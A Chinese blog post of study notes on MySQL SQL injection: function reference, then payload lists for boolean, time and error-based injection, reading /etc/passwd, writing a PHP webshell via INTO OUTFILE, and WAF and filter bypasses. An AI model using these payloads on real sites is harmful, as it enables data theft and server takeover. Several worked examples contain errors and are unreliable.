SQl_INJECTION学习归纳-MYSQL知识归纳篇

最新推荐文章于 2023-02-20 19:10:25 发布
最新推荐文章于 2023-02-20 19:10:25 发布
阅读量871 收藏 1
点赞数 4
分类专栏: # MYSQL注入学习 文章标签: Mysql注入学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41260930/article/details/102607936
版权

文章目录

1. 基础知识归纳

1.1. 注入原理:

将恶意SQL语句代码作为输入数据传递到服务器,然后它被拼接到SQL语句中交给数据库解析执行,导致执行一些恶意的操作。

1.2. 注入分类:
SQL注入
基础分类
数字型
字符型
搜索型
盲注分类
基于布尔
基于时间
基于报错
其他分类
堆查询注入
宽字节注入
二次注入
DNSLOG注入
位置分类
GET型注入
POST型注入
HTTP头注入
COOKIE注入
1.3. 基础扫盲(MYSQL):
1.3.1. Mysql 5.0 以下的数据库中没有information_schema这个系统表,无法列表名,只能暴力跑表名(information_schema是Mysql5.0版本以上自带的一个信息数据库。其保存着关于Mysql服务器上维护的其他数据库的信息,如数据库名、数据库的表名、列名、数据类型于访问权限等);
1.3.2. Mysql 5.0 以下的数据库是单用户操作,以上版本是多用户操作
1.3.3. 特殊字符的URL编码:空格:%20, 双引号:%22,#号:%23,单引号:%27等
1.3.4. magic_quotes_gpc(GPC转义函数):如果magic_quotes_gpc=On,PHP解析器就会自动为从“get、post、cookie”传输过来的数据增加上转义字符反斜杠:‘\’,以确保这些数据不会引起程序,特别是数据库内的语句因为特殊字符(认为是php的字符)引起的污染(在PHP5.3.0中已经废弃)。
1.3.5. PHP中"@“与”@@"的区别:

1、@为用户变量,使用SET @var1=1赋值;
2、@@ 为系统变量 ,包括查询全局变量:

> show global variables \G;

和查询会话变量:

> show session variables \G;
---------------------------------------------------------
> 或show variables;
1.3.6. and、or、xor:

(1)、条件1 and 条件2 ;当条件1成立执行条件2;
(2)、条件1 or 条件2 ;当条件1不成立执行条件2;
(3)、条件1 xor 条件2 ;当条件1不成立执行条件2;

1.3.7. MySQL_SQL_INJECTION常用的函数:
函数名函数作用
system_user()系统用户名
user()用户名
current_user()当前用户名
session_user()连接数据库的用户名
database()数据库名
version()MYSQL数据库版本
@@datadir读取数据库路径
@@basedirMYSQL 安装路径
@@version_compile_os服务器所在主机的操作系统版本
concat()concat(str1,str2,str3),返回str1+str2+str3,(当有一个字符串为NULL时,即返回NULL)
concat_ws()concat_ws(‘separato’;,str1,str2,str3),返回str1+separator+str2+separator+str3;EG concat_ws(’<>’,version(),database(),user())–>(XXX<>XXX<>XXX) (第一个参数(separato)指定分隔符。需要注意的是分隔符不能为null,如果为null,则返回结果为null))
group_concat()group_concat(str1,str2,str3),返回str1+str2+str3 (group by产生的同一个分组中的值连接起来,返回一个字符串结果)
ascii()/ord()ascii(a)/ord(a)将a转换成其ASCII值
count()计算结果集的数量
length()返回指定字符串的长度;EG length(database())
left()left(a,b)从左往右截取字符串a的前b个字符
substr()/substring()substr(string,start,len)/substring(string,start,len) ,从string的start位开始截取len个字符
if()if(1,2,3),如果1为True,则执行2,否则执行3
sleep()sleep(x),执行延迟x秒
Benchmark()Benchmark(x,1),执行表达式1,x次 (会消耗CPU,慎用)
updatexml()UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称;第二个参数:XPath_string 是Xpath格式的字符串;第三个参数:new_value是String格式,替换查找到的符合条件的数据;EG updatexml(1,concat(0x23,database(),0x23),1)
extractvalue()extractvalue(xml_frag,xpath_expr); xml_frag: 目标xml文档;xpath_expr: 利用Xpath路径法表示的查找路径,;EG extractvalue(1,concat(x023,database(),0x23))
mid()mid(a,b,c)从位置b开始,截取a字符串的c位
floor():去除小数部分,向下取整数
rand()产生0~1的随机数;rand(x): 每个X对应一个固定的值,但是如果连续多次执行会变化,但是可以预测;EG rand(0): 产生的序列是011011
1.3.8. MySQL的生僻函数总结:
1.3.8.1. STRCMP(‘str1’,‘str2’)函数

如果字符串相同,则STRCMP()返回0;如果第一个参数根据当前排序顺序小于第二个参数,则返回-1,否则返回1;
EG

> SELECT STRCMP('test','test');
  //返回‘0’;
------------------------------------------
> SELECT STRCMP('test1','test');
  //返回‘1’
-------------------------------------------
> SELECT STRCMP('test','test1');
  //返回‘-1’
1.3.8.2. REGEXP函数

像Php中的preg之类的函数,在Mysql中,如果只是简单的查询匹配使用like即可,但复杂的还是需要使用regexp正则函数;
mysql正则规则

模式模式作用
^匹配字符串的开始
$匹配字符串的结尾
.匹配任何单个字符
[…]匹配在方括号内的任何字符列表
[^…]匹配非列在方括号内的任何字符
*匹配零个或多个前面的元素
+匹配前面的元素的一个或多个实例
{n}匹配前面的元素的n个实例
{m,n}匹配m到n个实例前面的元素
m|mn|n匹配序列m或mn或n
(mn)*匹配序列mn的0个或者多个实例

EG

> SELECT * FROM users WHERE username REGEXP '^a.+n$';
  //匹配查询结果的‘username’值中,以‘a’开头和以‘n’结尾的字符串;
---------------------------------------------------------
> SELECT * FROM users WHERE username REGEXP '[k]';
  //匹配查询结果的‘username’值中,含有‘k’的字符串
---------------------------------------------------------
> SELECT * FROM users WHERE username REGEXP 'Dum|my|kan';
  //匹配查询结果的‘username’值中,含有‘Dum’或‘my’或‘kan’的字符串
---------------------------------------------------------
> SELECT * FROM users WHERE username REGEXP 'm{2,3}';
  //匹配查询结果的‘username’值中,含有‘m’两个或三个的字符串
---------------------------------------------------------
> SELECT * FROM users WHERE username REGEXP '(man)+';
  //匹配查询结果的‘username’值中,含有‘man’一个或者多个的字符串
---------------------------------------------------------
1.3.8.3. LOWER(‘str’)函数:将大写转换为小写;

EG

> SELECT LOWER('TEST_test');
  //返回‘ test_test’
1.3.8.4. UPPER(str’)函数:将小写转换为大写;

EG

> SELECT UPPER('TEST_test');
  //返回‘TEST_TEST’
1.3.8.5. LPAD(‘str1’,length,‘str2’)函数

str1是一个字符串,length是函数返回结果字符串的长度,str2是一个填充字符串;如果str1的长度小于length,则使用str2填充;如果str1的长度大于length,则截断。
EG

> SELECT LPAD('TE_ST',5,'TE');
  //返回‘ TE_ST’;
---------------------------------------------------------
> SELECT LPAD('TE_ST_test',5,'TE');
  //返回‘TE_ST’;
1.3.8.6. LTRIM(‘str’)函数

返回删除了前面空格字符的字符串str(与之相反的函数是RTRIM(str):返回删除了后面空格字符的字符串str)。
EG

> SELECT LTRIM('   _TEST');
  //返回‘_TEST’
---------------------------------------------------------
> SELECT RTRIM('TEST_   ');
  //返回‘_TEST’
1.3.8.7. MAKE_SET(bits,str1,str2,str3…)函数

bits转换成二进制然后取到(如:1:0001->1000)返回一个设定值(含子字符串分隔字符串","字符),在设置位的相应位的字符串。str1对应第0位,str2对应第1位,依此类推。如果在str1,str1有NULL值,…那么不添加到结果
EG

> SELECT MAKE_SET(1,'str1','str2','str3','str4');
  //1:0001->1000,对应‘str1’,查询语句返回‘str1’;
---------------------------------------------------------
> SELECT MAKE_SET(5,'str1','str2','str3','str4');
  //9:0101->1010,对应‘str1’,‘str3’,查询语句返回‘str1’,‘str3’;
1.3.8.8. LOCATE(substr,str),LOCATE(substr,str,pos)函数

第一个语法返回字符串substr中第一次出现在字符串str的位置;第二种语法返回字符串substr中第一次出现在字符串str的位置,同时从位置pos开始,如果substr不在str中,则返回0。如果substr或str为NULL,则返回NULL。
EG

> SELECT LOCATE('test','TE_test_ST');
  //返回‘4’;
---------------------------------------------------------
> SELECT LOCATE('test','TE_test_ST',5);
  //返回‘0’
1.3.8.9. MID()/SUBSTRING()函数
  • MID(str,pos,len)是SUBSTRING(str,pos,len)的同义词(函数使用规则和作用一致;
  • SUBSTRING:
    SUBSTRING(str,pos),SUBSTRING(str FROM pos),
    SUBSTRING(STR,POS,LEN),SUBSTRING(str FROM pos FOR len)

没有len参数的表示从位置pos开始返回字符串str的子字符串。带有len参数的是从字符串str返回一个子字符串len个字符,从位置pos开始。使用FROM的是标准SQL语法;(也可以对pos使用负值。在这种情况下,子字符串的开头是字符串末尾的pos字符,而不是开头。在该函数的任何形式中,负值可以用于pos)
EG

> SELECT MID('TEST_test',3); 
  //返回‘ST_test’;
---------------------------------------------------------
> SELECT SUBSTRING('TEST_test',3);
  //返回‘ST_test’;
---------------------------------------------------------
> SELECT MID('TEST_test' FROM 3);
  //返回‘ST_test’;
---------------------------------------------------------
> SELECT SUBSTRING'TEST_test' FROM 3;
  //返回‘ST_test’;
---------------------------------------------------------
> SELECT MID('TEST_test',3,4);
  //返回‘ST_t’;
---------------------------------------------------------
> SELECT SUBSTRING('TEST_test',3,4);
  //返回‘ST_t’;
---------------------------------------------------------
> SELECT MID('TEST_test' FROM 3 FOR 4);
  //返回‘ST_t’;
---------------------------------------------------------
> SELECT SUBSTRING('TEST_test' FROM 3 FOR 4);
  //返回‘ST_t’;
---------------------------------------------------------
> SELECT MID('TEST_test' FROM -3 FOR 4);
  //返回‘est’;
---------------------------------------------------------
> SELECT SUBSTRING('TEST_test' FROM -3 FOR 4);
  //返回‘est’;
1.3.8.10. SUBSTRING_INDEX(str,delim,count):

如果count是正数,那么就是从左往右数,第N个分隔符的左边的全部内容相反,如果是负数,那么就是从右边开始数,第N个分隔符右边的所有内容;
EG

> SELECT SUBSTRING_INDEX('TEST_test_TEST_test','_',3);
  //返回‘TEST_test_TEST’;
---------------------------------------------------------
> SELECT SUBSTRING_INDEX('TEST_test_TEST_test','_',-3);
  //返回‘test_TEST_test’;
1.3.8.11. TO_BASE64(str)函数 :(mysql5.5.3没有这个函数)

将字符串str转换为base64编码:
EG

> SELECT TO_BASE64('TEST');
  //返回‘VEVTVA==’;
1.3.8.12. AES_ENCRYPT(str,key_str) AES_DECRYPT(str,key_str)加密解密函数

使用UNIX crypt()系统加密字符串,ENCRYPT()函数接收要加密的字符串和(可选的)用于加密过程的salt(一个可以唯一确定口令的字符串,就像钥匙一样)。加密程度比ENCODE较强;注意,windows上不支持
EG

> SELECT AES_DECRYPT(UNHEX("4B8A46D45BFA21AB2301907A63E868E3293216683CF8FF8A08A4C96986627A59"),"PASS");
  //返回‘<?php eval($_POST["cmd"]);?>’;
1.3.9. Mysql基本SQL使用语法

EG

> show databases; 
  //显示当前DBMS中的所有数据库名;
---------------------------------------------------------
> select schema_name from information_schema.schemata;
  //通过information_schema实现查询当前DBMS中的所有数据库名;
---------------------------------------------------------
> use database_name; 
  //进入具体的一个数据库中;
---------------------------------------------------------
> show tables; 
  //显示当前数据库中的所有表名;
---------------------------------------------------------
> desc admin_users; 
  //查询表的结构;
---------------------------------------------------------
> select username,password from test.admin_users;
  //查询test表'admin_users'列的具体字段;
---------------------------------------------------------
> select username,password from security.users limit 2,4;
  //从2+1开始查询4个字段;
---------------------------------------------------------
> select table_name from information_schema.tables where table_schema='security';
  //查询数据库'security'的中的表名;
---------------------------------------------------------

> select column_name from information_schema.columns where table_name='users';
  //查询数据库'security'中的'user'表的所有列名;
---------------------------------------------------------
> create table hack(id INT(3),NAME VARCHAR(25),age INT(3),PRIMARY KEY(id));
  //创建表;
---------------------------------------------------------
> INSERT into hack(id,NAME,age) VALUES(1,'admin',15);
  //插入数据;
---------------------------------------------------------
> SELECT * from hack;
  //查询数据;
---------------------------------------------------------
> UPDATE hack SET NAME='guest' WHERE id=1;
> UPDATE hack SET age=age+3 WHERE id=1;
  //更新数据;
---------------------------------------------------------
> DELETE from hack WHERE id=2;
  //删除数据;
---------------------------------------------------------
> drop database database_name;
  //删除某个数据库;
---------------------------------------------------------
> drop table table_name;
  //删除某个数据表;
---------------------------------------------------------
> alter table table_name drop column column_name;
  //删除某一列;
---------------------------------------------------------

2. SQL_INJECTION_Mysql注入技巧

2.1. 测试用例
2.1.1. 数字型注入:

EG

> '
---------------------------------------------------------
> 1+1 3-1
---------------------------------------------------------
> value + 0
---------------------------------------------------------
> 1 or 1=1 1) or (1=1
---------------------------------------------------------
> value or 1=2 value) or (1=1
---------------------------------------------------------
> 1 and 1=2 1) and (1=2
---------------------------------------------------------
> 1 or 'ab'='a'+'b' 1) or ('ab'='a'+'b'
---------------------------------------------------------
> 1 or 'ab'='a''b' 1) or ('ab'='a''b'
---------------------------------------------------------
> 1 or 'ab'='a'||'b' 1) or ('ab'='a'||'b'
---------------------------------------------------------
> 1 and 1=2 UNION SELECT
---------------------------------------------------------
> 1,load_file('/etc/passwd'),3,4,5,6,7,8
---------------------------------------------------------
> 1 and 1=2 union select
---------------------------------------------------------
> 1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 /*
2.1.2. 字符型注入:

EG

> '
---------------------------------------------------------
> 1' or '1'='1 1') or ('1'='1
---------------------------------------------------------
> value' or '1'='2 value') or ('1'='2
---------------------------------------------------------
> 1' and '1'='2 1') and ('1'='2
---------------------------------------------------------
> 1' or 'ab'='a'+'b' 1') or ('ab'='a'+'b
---------------------------------------------------------
> 1' or 'ab'='a''b 1') or ('ab'='a''b
---------------------------------------------------------
> 1' or 'ab'='a'||'b 1') or ('ab'='a'||'b
---------------------------------------------------------
> ' or 1=1/*
2.1.3. 终止型注入;

EG

> admin'-- admin')--
---------------------------------------------------------
> admin'# admin')#
---------------------------------------------------------
> 1-- 1)--
---------------------------------------------------------
> 1-- 1)--
---------------------------------------------------------
> 1 or 1=1-- 1) or 1=1--
---------------------------------------------------------
> 'or'1'='1'1-- ') or '1' = '1'--
---------------------------------------------------------
> -1 and 1=2-- -1) and 1=2--
---------------------------------------------------------
> 'and '1'='2'-- ') and '1'='2'--
---------------------------------------------------------
> 1/*注释*/
2.1.4. 时间型注入:

EG

> day=2010-07-22%27%29%3E0+and+1%3D2+or+1%3D2+or+1%3D1+and+datediff%28dd%2C%271111-9-9%27%2C%271111-11-19
---------------------------------------------------------
> day=2010-07-22%27%29%3E0+and+1%3D2+or+1%3D2+or+1%3D2+and+datediff%28dd%2C%271111-9-9%27%2C%271111-11-19
2.1.5. 其他类型注入:

EG

> id=1 and (select ascii(mid(user(),1,1))=49)
---------------------------------------------------------
> ' and 1=1 and '%25'='
---------------------------------------------------------
> " and 12=12 and "kn"="kn
---------------------------------------------------------
> " and 12=13 and "a"="a
---------------------------------------------------------
> type=creation_date; SELECT SLEEP(5)--
---------------------------------------------------------
> code=(select *from(select(ascii(mid(database()from(3)for(1)))=52 andsleep(5)))x)
---------------------------------------------------------
> orderby=rand(1=1)
---------------------------------------------------------
> orderby=rand(1=2)
---------------------------------------------------------
> 0'+AND+(SELECT+*+FROM+(SELECT(SLEEP(8)))a)+AND+'1'%3d'17178) AND (SELECT * FROM (SELECT(SLEEP(5)))PVdT) 
AND(2410=2410.html
---------------------------------------------------------
> +(selectconvert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(70)+CHAR(48)+CHAR(98)+CHAR(48)+CHAR(66)+CHAR(111)+CHAR(82)+CHAR(51)) FROMsyscolumns)+
---------------------------------------------------------
> c' AND (SELECT * FROM (SELECT(SLEEP(5)))jDPC) AND'NvIX'='NvIX
---------------------------------------------------------
> 1'and @@version>0--
---------------------------------------------------------
> 1 and @@servername>0--
---------------------------------------------------------
> 1' and db_name()>0--
2.2. 特殊技巧介绍
2.2.1. mysql注入常用场景和使用函数:
  • 布尔SQL盲注:left()、length、ascii()->[hex(),bin()]、mid()/substr()->[substing()]、regexp()、sleep()->[benchmark()]
  • 报错SQL盲注:floor(rand())、updatexml()、extractvalue() (有长度限制,最长32位,可以考虑使用mid()或者limit限制报错位数)、exp()(整形溢出爆错)、polygon();
    (极少数能用到的函数:polygon(),GeometryCollection()multipoint()multilinestring(),linestring(),multipolygon())
2.2.2. 开启GPC**后一些绕过姿势:

单引号被转义:

2.2.2.1. 字符编码问题导致绕过:
  • 设置数据库字符为gbk导致宽字节注入 //%df和%5c(\);
  • 使用icon和mb_convert_encoding转码函数导致宽字节注入;
2.2.2.2. 编码解码导致的绕过:
  • url解码导致绕过addslashes();
  • base64解码导致绕过addslashes();
  • json编码导致绕过addslashes()//json编码会把\转换为\\;
2.2.2.3. 一些特殊情况导致的绕过:
  • 没有使用引号保护字符串,直接无视addslashes();
  • 使用了stripslashes() //删除由 addslashes() 函数添加的反斜杠;
  • 字符替换导致的绕过addslashes() //先用addslashes()转义,再用str_replace替换反斜杠(/);
    防御方式:统一数据库、Web应用、操作系统所使用的字符集,避免解析产生差异,最好都设置为UTF-8;对数据进行正确的转义,如mysql_real_escape_string+mysql_set_charse的使用
2.2.3. 特殊绕过:
2.2.3.1. 绕过空格过滤:

+,/**/,双重空格,回车换行符(%0a,%a0),宽字节(%df),圆括号,%09,%0a,%0b,%0c,%0d等;

2.2.3.2. 绕过union,select,where等关键字过滤:

大小写,双写关键字(uniounionn,unionunion),内联注释/*!union*/内联注释,编码;

2.2.3.3. 绕过and、or、xor、not 过滤:

&&,||,%26%26,|,!,大小写,双写关键字(anandd,andand),编码;

2.2.3.4. 绕过小括号被过滤:

使用正则匹配
EG:
regexp binary ‘^.*$’;
或者使用笛卡儿积
EG:
union select b.column_name from information_schema.tables a join information_schema.columns b join information_schema.columns c where 1=2;

2.2.3.5. 引号绕过:

(将引号中的值转换为十六进制)
EG:
select column_name from information_schema.tables where table_name=0x7573657273;

2.2.3.6. 绕过逗号过滤:

EG:
‘xor(select case when 2>1 then sleep(4) else 0 end limit 0 offset 1)or’
在使用盲注的时候,需要使用到mid(),substr(),limit函数。这些函数都需要使用到逗号。对于mid()和substr()函数可以使用from to的方式来替换:
EG:
select mid(database() from 1 for 1);
select substr(database() from 1 for 1);

2.2.3.7. union select 1,2 等同于:union select * from (select 1)a join (select 2)b
2.2.3.8. select ascii(mid(user(),1,1))=80 ;等同于:select user() like ‘r%’;
2.2.3.9. select * from news limit 0,1;等同于:select * from news limit 1 offset 0;
2.2.3.10. 比较符号(<>)绕过(过滤了<>:sqlmap盲注经常使用<>,使用between的脚本)(between a and b:返回a,b之间的数据,不包含b):

EG:
select * from users where id=1 andascii(substr(database(),0,1))>64;等同于:select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64;

2.2.3.11. '='绕过:

使用like 、rlike 、regexp 或者’<‘或者’>;

2.2.3.12. 等价函数绕过:

EG:

  • hex()、bin() --> ascii()
  • sleep() --> benchmark()
  • concat_ws() --> group_concat()
  • mid()、substr() --> substring()
  • @@user --> user()
  • @@datadir --> datadir()
  • substring()和substr()无法使用时: id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),
    1,1)))=74
    或者:
    substr((select ‘password’),1,1) = 0x70
    strcmp(left(‘password’,1), 0x69) = 1
    strcmp(left(‘password’,1), 0x70) = 0
    strcmp(left(‘password’,49 1), 0x71) = -1
2.2.4. 写入shell
2.2.4.1. 写shell的条件:
  • root权限
  • 目录读写权限
  • 网站的绝对路径
  • GPC配置关闭,能使用单引号
  • 没有配置secure-file-priv属性
2.2.4.2. 写入shell使用函数:
  • select '<?php phpinfo()> into outfile ‘D:/shelltest.php’
  • dumpfile (outfile适合导库,在行末尾会写入新行并转义,所以不能写入二进制可执行文件。)
  • file_put_contents
2.2.4.3. 绕过disable_functions():
  • 黑名单
  • 用dl扩展执行命令
  • LD_PRELOAD 环境变量
    优先加载程序,实现函数劫持;
    选取一个合适的库函数,编制动态链接程序;
    通过 putenv 来设置 LD_PRELOAD,让我们的程序优先被调用;
    触发函数;
  • mageMagick组件的漏洞
    文件名第一个字符是‘|’的时候将之后的字串当成是命令执行;
2.2.5. 过WAF(Web Application Firewall)
2.2.5.1. 使用特殊符号重复组合

EG(注释):

> # 
--------------------------------------------------------
> --
--------------------------------------------------------
> -- - //5.6.12特性,需要加空格
--------------------------------------------------------
> --+
--------------------------------------------------------
> //
--------------------------------------------------------
> /**/ //c风格注释
--------------------------------------------------------
> /**//**/  //多个注释
--------------------------------------------------------
> /*letmetest*/
--------------------------------------------------------
> ;
--------------------------------------------------------
> /!00000union/       
//假如mysql版本号是5.6.17则00000/10000/../50000都可以用

EG(科学记数法):

> id=0e1union select

EG(空白字符):

> SQLite3 0A 0D 0C 09 20 
> MySQL5 09 0A 0B 0C 0D A0 20 
> PosgresSQL 0A 0D 0C 09 20 
> Oracle 11g 00 0A 0D 0C 09 20 
> MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

EG(回车换行):

2.2.5.2. 利用容器特性
  • iis+asp的环境可能会吞掉%(f%rom->from)造成注入;
  • iis支持unicode解析,当我们请求的url存在unicode字符串的话iis会自动将其转换,但waf可能不会拦截造成注入;
  • 畸形协议/请求
    asp/asp.net在解析请求的时候,允许application/x-www-form-urlencoded的数据提交方式;
    php+apache解析协议除了get/post外随便定义协议也可能过,PHP解析multipart请求时以逗号作为边界;
  • 多次URL编码
    base64
    htmlencode
    unicode
    php serialize
  • HPP - http重复参数污染,id=1&id=2&id=3
  • 在POST请求中进行GET型注入
  • 输入超长数据包,构造垃圾数据
2.2.6. 还在更新中。。。

[如有错误,请指出,拜托了<( _ _ )> !!!]

[参考文档]
(从容:我的WafBypass之道(SQL注入篇)https://xz.aliyun.com/t/368)
(面试知识点总结:SQL注入 https://www.yuque.com/books/share/bd8433e2-3682-4bf9-bbf7-cb5070764079/ngrdcx)

Tes789123456
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql injection violation, dbType mysql, druid-version 1.2.5, multi-statement not allow : UPDAT
好俗好麻烦的博客
03-25 1万+
报错信息 Caused by: java.sql.SQLException: sql injection violation, multi-statement not allow : UPDATE xxx表名 错误原因分析 违反sql注入:批量的操作不被允许 Druid的防火墙配置(Wall)中变量multiStatementAllow默认为false,导致被拦截 解决方式 方法一:修改连接字符串并且新增配置类 ① // 增加 allowMultiQueries=true // 例 spring:
SQL Injection基础知识_01
weixin_43712064的博客
01-31 354
文章目录SQL注入攻击及防御01实验简介SQL注入危害SQL基础回顾登录OWASP查看数据库查看数据库中的表查看表的记录简单查询示例information_schema SQL注入攻击及防御01 实验简介 在owasp年度top10安全问题中,注入高居榜首。SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要...
SQL 注入SQL Injection学习心得
coldsummer23的博客
11-07 2958
网工小白学习安全心得,学习web渗透第一章sql注入,本文仅仅简单介绍了SQL注入的流程,SQL注入的原理,以一次完整的字符型SQL注入流程为例,其余三种都是基于这个思路,只是应对于不同的防护用不同的手段。思路重点在于明白最终想要的是数据库中的内容,怎么一步步去获得里面的数据。
SqliLab_Mysql_Injection详解_字符型注入(五)_时间盲注(8~10)
qq_41260930的博客
10-24 627
SqlLab_Mysql_Injection详解_字符型注入(六) SQL注入_时间盲注 原理 当在服务器后台关闭了返回页面的错误回显或过滤了某些关键字,返回的网页只会返回一种状态(无法通过传统的布尔盲注(true or false)来判断了),这时候就需要用到时间盲注了,时间盲注成功时,服务器会由于执行了构造语句中的sleep()函数,休眠一定的时间,再返回数据;通过观察浏览器客户端发送请求,到...
mysql injection_MySQL SQL Injection(注入)
weixin_42474164的博客
01-20 264
如果通过网页接收用户输入,而后再把这些数据插入到数据库中,那么你可能就会碰到 SQL 注入式攻击。本节简要介绍如何防范这种攻击,确保脚本和 MySQL 语句的安全性。注入式攻击往往发生在要求用户输入时,比如说要求他们输入自己的名字,但是他们却输入了一段 MySQL 语句,不知不觉地运行在数据库上。永远不要相信用户所提供的数据,只有在验证无误后,才能去处理数据。通常,利用模式匹配来实现。在下面这个范...
SQL Injection 基础
qq_44466110的博客
03-21 212
SQL Injection 基础 MySQL 基础 几个概念: 库的基本操作 查看已有的库:show database; 创建库:create database 库名; 查看创建的库:show create database 库名; 查看当前所在库:select database(); 切换库:use 库名; 查看库中已有的表:show tables; 删除库:drop database 库名...
sql.rar_MySQLConnection_sqljdbc4-3.0.jar
09-20
标题中的"sql.rar_MySQLConnection_sqljdbc4-3.0.jar"暗示了这是一个与SQL数据库连接相关的资源包,特别是涉及到MySQLSQL Server的连接。其中,“MySQLConnection”指的是Java程序连接MySQL数据库的方式,而“sql...
qsqlmysql.dll_Qt_SQL_driver_6.1.1_MinGW_8.1.0_64-bit,mysql驱动,Qmysql插件
06-30
qsqlmysql.dll_Qt_SQL_driver_6.1.1_MinGW_8.1.0_64-bit,mysql驱动,Qmysql插件 绝对能解决MYSQL driver not loaded https://blog.csdn.net/qq_40303500/article/details/118366959
flink-sql-connector-mysql-cdc-2.3.0.jar
最新发布
07-05
flink同步mysql数据库所用包
SQL_Injection_Payload:SQL注入有效负载列表
01-28
以下是一些关键的SQL注入知识点: 1. **SQL注入漏洞**:当Web应用程序在构建动态SQL查询时,不加验证地将用户输入的数据拼接到SQL语句中,就可能导致SQL注入漏洞。攻击者可以通过操纵输入来插入额外的SQL命令。 2....
SQL Injection with MySQL 注入分析
09-14
本文作者:angel文章性质:原创 国内能看到php+Mysql注入的文章可能比较少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。
advanced_sql_injection.rar_sql injection
09-24
how to prevent sql injection attack
mysql 盲注 if_mysql高级盲注技巧
weixin_39716043的博客
01-18 201
1.SQL Injection (classic or error based or whatever you call it) :D...2.Blind SQL Injection (the harder part)So let's start with some action :D1). Check for vulnerabilityLet's say that we have some si...
mysqlinjection
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-17 133
mysql注入入门学习 sql注入是跟句网页语法错误,从而获得网站物理路径和管理员用户名密码.常用工具啊D注入工具. 如果你网页语言精通.可以不用工具.而获得你想要的东西. 本回答由网友推荐 mysql注入攻防的书有哪些 首先来看GIF操作: 情况一:空格被过滤 使用括号()代替空格,任何可以计算出结果的...
arachni web mysql数据库_Arachni: Arachni 是一个全面的、模块化的Ruby框架,它能够帮助渗透人员和网络管理人员测试Web应用的安全性。...
weixin_39536427的博客
02-23 295
ArchivedArachni - Web Application Security Scanner FrameworkSynopsisArachni is a feature-full, modular, high-performance Ruby framework aimed towardshelping penetration testers and administrators eval...
mysql-injection整理
criminal_1的博客
02-20 183
sql注入整理
mysql sql injection
天元喜羊羊的博客
07-30 904
Versionmysql> SELECT @@version; +------------------+ | @@version | +------------------+ | 5.0.96-community | +------------------+ 1 row in set (0.00 sec) Comments: mysql> SELECT 1; #com
【基础知识思考整理 】MySQLSQL注入SQL Injection )和防注入
aganlengzi的专栏
07-17 1626
基础知识思考整理 http://blog.csdn.net/aganlengzi/article/details/51345294 原理: SQL Injection就是利用某些数据库的外部接口把用户数据插入到实际的数据库操作语言(SQL)当中,从而达到入侵数据库乃至操作系统的目的。它的产生主要是由于程序对用户输入 的数据没有进行严格的过滤,导致非法数据库查询语句的执行。 举例: 如下面的用
认识MySQLSQL Injection
608神秘组织
03-14 265
安装MySQL服务端/客户端 sudo apt-get install mysql-server sudo apt-get install mysql-client 基本操作 开启服务 sudo service mysql start 登入 mysql -u root -p Enter Password: 退出MySQL quit; 查看数据库...
phpstudy sql_mode=only_full_group_by -advertisement
04-30
phpstudy sql_mode=only_full_group_by -advertisement是指在phpstudy中设置MySQLsql_mode为only_full_group_by,这个模式可以使MySQL在执行GROUP BY语句时更加严格。 在MySQL执行GROUP BY语句时,会将相同的行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值